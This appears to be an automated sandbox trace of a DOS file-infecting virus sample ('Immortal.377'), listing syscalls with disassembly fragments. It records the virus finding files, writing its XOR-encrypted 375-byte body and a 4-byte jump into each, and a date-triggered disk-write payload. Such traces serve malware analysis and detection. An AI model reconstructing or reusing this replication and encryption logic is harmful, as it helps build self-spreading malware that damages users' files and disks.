Sample viewer

vx.netlux.org/Virus.DOS.VCC.Immortal.377

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:52:04.326724272Z	26	PC: 12b98 \| Set disk transfer address
2018-12-17T22:52:04.328153477Z	53	PC: 12b9e \| Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:52:04.330397083Z	53	PC: 12bab \| Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:52:04.331600149Z	44	PC: 12bb6 \| Get time 0x12bb6: cmp dl, 0xd 0x12bb9: jg 0x12bbf 0x12bbb: mov al, 0x82 0x12bbd: out 0x21, al 0x12bbf: mov ah, 0x2c 0x12bc1: int 0x21 0x12bc3: cmp dl, 0x32 0x12bc6: jg 0x12bf4 0x12bc8: mov ah, 9 0x12bca: lea dx, word ptr [bp + 0x196] 0x12bce: int 0x21 0x12bd0: mov ah, 0 0x12bd2: int 0x16 0x12bd4: jmp 0x12bf4 0x12bd6: imul cx, word ptr [di + 0x4d], 0x526f 0x12bdb: push sp 0x12bdc: popaw 0x12bdd: dec sp 0x12bde: xor si, word ptr cs:[bx] 0x12be1: aaa
2018-12-17T22:52:04.333816732Z	44	PC: 12bc3 \| Get time 0x12bc3: cmp dl, 0x32 0x12bc6: jg 0x12bf4 0x12bc8: mov ah, 9 0x12bca: lea dx, word ptr [bp + 0x196] 0x12bce: int 0x21 0x12bd0: mov ah, 0 0x12bd2: int 0x16 0x12bd4: jmp 0x12bf4 0x12bd6: imul cx, word ptr [di + 0x4d], 0x526f 0x12bdb: push sp 0x12bdc: popaw 0x12bdd: dec sp 0x12bde: xor si, word ptr cs:[bx] 0x12be1: aaa 0x12be2: and byte ptr [bp + di + 0x45], bh 0x12be5: outsb dx, byte ptr [si] 0x12be6: arpl word ptr [bp + si + 0x79], si 0x12be9: jo 0x12c5f 0x12beb: and word ptr fs:[bx + di], sp 0x12bef: jge 0x12bf8
2018-12-17T22:52:04.336902847Z	78	PC: 12c0d \| Find first file
2018-12-17T22:52:04.343559152Z	61	PC: 12c1d \| Open file (Filename = '')
2018-12-17T22:52:04.350756653Z	63	PC: 12c2b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:52:04.36401833Z	66	PC: 12c3a \| Move file pointer
2018-12-17T22:52:04.36554477Z	44	PC: 12b5b \| Get time 0x12b5b: cmp dl, 0 0x12b5e: je 0x12b57 0x12b60: mov byte ptr [bp + 0x13f], dl 0x12b64: call 0x12b76 0x12b67: mov ah, 0x40 0x12b69: mov cx, 0x177 0x12b6c: lea dx, word ptr [bp + 0x100] 0x12b70: int 0x21 0x12b72: call 0x12b76 0x12b75: ret 0x12b76: mov cx, 0x132 0x12b79: lea si, word ptr [bp + 0x145] 0x12b7d: xor byte ptr [si], 0 0x12b80: inc si 0x12b81: dec cx 0x12b82: jne 0x12b7d 0x12b84: ret 0x12b85: lea si, word ptr [bp + 0x273] 0x12b89: mov di, 0x100 0x12b8c: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:52:04.367996661Z	64	PC: 12b72 \| Write file or device (Write 375 bytes on handle 5)
2018-12-17T22:52:04.384071113Z	66	PC: 12c4c \| Move file pointer
2018-12-17T22:52:04.38566772Z	64	PC: 12c57 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:52:04.392961775Z	62	PC: 12c60 \| Close file
2018-12-17T22:52:04.403041821Z	79	PC: 12c0d \| Find next file
2018-12-17T22:52:04.40609833Z	61	PC: 12c1d \| Open file (Filename = '')
2018-12-17T22:52:04.414231294Z	63	PC: 12c2b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:52:04.422569355Z	66	PC: 12c3a \| Move file pointer
2018-12-17T22:52:04.424542676Z	44	PC: 12b5b \| Get time 0x12b5b: cmp dl, 0 0x12b5e: je 0x12b57 0x12b60: mov byte ptr [bp + 0x13f], dl 0x12b64: call 0x12b76 0x12b67: mov ah, 0x40 0x12b69: mov cx, 0x177 0x12b6c: lea dx, word ptr [bp + 0x100] 0x12b70: int 0x21 0x12b72: call 0x12b76 0x12b75: ret 0x12b76: mov cx, 0x132 0x12b79: lea si, word ptr [bp + 0x145] 0x12b7d: xor byte ptr [si], 0x3f 0x12b80: inc si 0x12b81: dec cx 0x12b82: jne 0x12b7d 0x12b84: ret 0x12b85: lea si, word ptr [bp + 0x273] 0x12b89: mov di, 0x100 0x12b8c: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:52:04.42732956Z	64	PC: 12b72 \| Write file or device (Write 375 bytes on handle 5)
2018-12-17T22:52:04.430918977Z	66	PC: 12c4c \| Move file pointer
2018-12-17T22:52:04.43291402Z	64	PC: 12c57 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:52:04.43639533Z	62	PC: 12c60 \| Close file
2018-12-17T22:52:04.450590997Z	79	PC: 12c0d \| Find next file
2018-12-17T22:52:04.454239856Z	61	PC: 12c1d \| Open file (Filename = '')
2018-12-17T22:52:04.462079328Z	63	PC: 12c2b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:52:04.469361369Z	66	PC: 12c3a \| Move file pointer
2018-12-17T22:52:04.471644575Z	44	PC: 12b5b \| Get time 0x12b5b: cmp dl, 0 0x12b5e: je 0x12b57 0x12b60: mov byte ptr [bp + 0x13f], dl 0x12b64: call 0x12b76 0x12b67: mov ah, 0x40 0x12b69: mov cx, 0x177 0x12b6c: lea dx, word ptr [bp + 0x100] 0x12b70: int 0x21 0x12b72: call 0x12b76 0x12b75: ret 0x12b76: mov cx, 0x132 0x12b79: lea si, word ptr [bp + 0x145] 0x12b7d: xor byte ptr [si], 0x44 0x12b80: inc si 0x12b81: dec cx 0x12b82: jne 0x12b7d 0x12b84: ret 0x12b85: lea si, word ptr [bp + 0x273] 0x12b89: mov di, 0x100 0x12b8c: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:52:04.474176339Z	64	PC: 12b72 \| Write file or device (Write 375 bytes on handle 5)
2018-12-17T22:52:04.478089949Z	66	PC: 12c4c \| Move file pointer
2018-12-17T22:52:04.480324271Z	64	PC: 12c57 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:52:04.483258409Z	62	PC: 12c60 \| Close file
2018-12-17T22:52:04.492387461Z	79	PC: 12c0d \| Find next file
2018-12-17T22:52:04.496303608Z	61	PC: 12c1d \| Open file (Filename = '')
2018-12-17T22:52:04.503575376Z	63	PC: 12c2b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:52:04.510656804Z	66	PC: 12c3a \| Move file pointer
2018-12-17T22:52:04.513413183Z	44	PC: 12b5b \| Get time 0x12b5b: cmp dl, 0 0x12b5e: je 0x12b57 0x12b60: mov byte ptr [bp + 0x13f], dl 0x12b64: call 0x12b76 0x12b67: mov ah, 0x40 0x12b69: mov cx, 0x177 0x12b6c: lea dx, word ptr [bp + 0x100] 0x12b70: int 0x21 0x12b72: call 0x12b76 0x12b75: ret 0x12b76: mov cx, 0x132 0x12b79: lea si, word ptr [bp + 0x145] 0x12b7d: xor byte ptr [si], 0x44 0x12b80: inc si 0x12b81: dec cx 0x12b82: jne 0x12b7d 0x12b84: ret 0x12b85: lea si, word ptr [bp + 0x273] 0x12b89: mov di, 0x100 0x12b8c: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:52:04.515438413Z	64	PC: 12b72 \| Write file or device (Write 375 bytes on handle 5)
2018-12-17T22:52:04.518935679Z	66	PC: 12c4c \| Move file pointer
2018-12-17T22:52:04.523037988Z	64	PC: 12c57 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:52:04.526107598Z	62	PC: 12c60 \| Close file
2018-12-17T22:52:04.535113038Z	79	PC: 12c0d \| Find next file
2018-12-17T22:52:04.538155022Z	61	PC: 12c1d \| Open file (Filename = '')
2018-12-17T22:52:04.546453581Z	63	PC: 12c2b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:52:04.554024109Z	66	PC: 12c3a \| Move file pointer
2018-12-17T22:52:04.556129041Z	44	PC: 12b5b \| Get time 0x12b5b: cmp dl, 0 0x12b5e: je 0x12b57 0x12b60: mov byte ptr [bp + 0x13f], dl 0x12b64: call 0x12b76 0x12b67: mov ah, 0x40 0x12b69: mov cx, 0x177 0x12b6c: lea dx, word ptr [bp + 0x100] 0x12b70: int 0x21 0x12b72: call 0x12b76 0x12b75: ret 0x12b76: mov cx, 0x132 0x12b79: lea si, word ptr [bp + 0x145] 0x12b7d: xor byte ptr [si], 0x4a 0x12b80: inc si 0x12b81: dec cx 0x12b82: jne 0x12b7d 0x12b84: ret 0x12b85: lea si, word ptr [bp + 0x273] 0x12b89: mov di, 0x100 0x12b8c: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:52:04.559116882Z	64	PC: 12b72 \| Write file or device (Write 375 bytes on handle 5)
2018-12-17T22:52:04.562248422Z	66	PC: 12c4c \| Move file pointer
2018-12-17T22:52:04.563739185Z	64	PC: 12c57 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:52:04.567403312Z	62	PC: 12c60 \| Close file
2018-12-17T22:52:04.575796226Z	42	PC: 12c75 \| Get date 0x12c75: cmp dh, 0x11 0x12c78: jl 0x12c99 0x12c7a: cmp dl, 8 0x12c7d: jl 0x12c99 0x12c7f: mov ah, 0x19 0x12c81: int 0x21 0x12c83: mov cx, 0x25 0x12c86: mov dx, 0 0x12c89: lea bx, word ptr [bp + 0x196] 0x12c8d: push ds 0x12c8e: pop es 0x12c8f: mov byte ptr [bp + 0x255], 0x26 0x12c94: int 0x19 0x12c96: add sp, 2 0x12c99: mov ah, 0x1a 0x12c9b: mov dx, 0x80 0x12c9e: int 0x21 0x12ca0: mov di, 0x100 0x12ca3: push di 0x12ca4: ret
2018-12-17T22:52:04.577816607Z	26	PC: 12ca0 \| Set disk transfer address